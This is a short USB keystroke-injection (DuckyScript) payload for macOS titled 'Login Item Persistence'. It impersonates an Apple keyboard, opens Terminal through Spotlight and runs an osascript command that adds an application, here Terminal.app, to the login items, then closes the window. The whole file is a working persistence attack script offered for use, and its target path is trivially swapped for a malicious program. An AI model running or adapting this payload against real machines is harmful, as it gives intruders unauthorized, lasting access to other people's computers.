REM Author: Generated
REM Title: Login Item Persistence
REM Target: macOS
REM Version: 1.0
REM Category: Persistence
REM ---
DELAY 1000
REM Add application to login items
REM ID 05ac:021e Apple:Keyboard
DELAY 1000
GUI SPACE
DELAY 500
STRING terminal
DELAY 500
ENTER
DELAY 1000
STRING osascript -e 'tell application "System Events" to make login item at end with properties {path:"/Applications/Utilities/Terminal.app", hidden:false}'
ENTER
DELAY 500
STRING echo 'Login item added'
ENTER
DELAY 500
GUI w
